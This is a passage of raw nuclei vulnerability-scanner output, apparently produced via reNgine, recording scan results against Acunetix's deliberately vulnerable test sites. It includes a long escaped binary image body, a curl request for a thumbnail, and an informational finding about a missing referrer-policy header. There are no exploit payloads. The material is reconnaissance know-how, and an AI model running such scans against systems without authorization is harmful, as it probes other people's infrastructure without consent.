fffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:28.36987459Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import 